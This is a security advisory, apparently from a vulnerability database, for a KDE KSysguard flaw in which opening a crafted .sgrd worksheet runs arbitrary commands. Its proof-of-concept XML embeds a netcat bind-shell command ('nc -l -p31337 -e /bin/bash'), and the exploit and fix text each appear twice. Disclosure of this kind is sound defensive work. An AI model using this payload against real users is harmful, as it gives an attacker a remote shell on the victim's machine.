KDE KSysguard '.sgrd' File Processing Arbitrary Command Execution Vulnerability
BID:38872
Info
KDE KSysguard '.sgrd' File Processing Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 38872 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 20 2010 12:00AM |
| Updated: | Mar 20 2010 12:00AM |
| Credit: | emgent |
| Vulnerable: |
KDE KDE 4.4.1 KDE KDE 4.4 KDE KDE 4.3.3 KDE KDE 4.3.2 KDE KDE 4.2.4 KDE KDE 4.0.3 KDE KDE 4.0.2 KDE KDE 4.0.1 KDE KDE 4.0 |
| Not Vulnerable: | |
Exploit / POC
KDE KSysguard '.sgrd' File Processing Arbitrary Command Execution Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim to use the affected application to open a malicious file.
The following XML file is available:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
To exploit this issue, an attacker must entice an unsuspecting victim to use the affected application to open a malicious file.
The following XML file is available:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
Solution / Fix
KDE KSysguard '.sgrd' File Processing Arbitrary Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].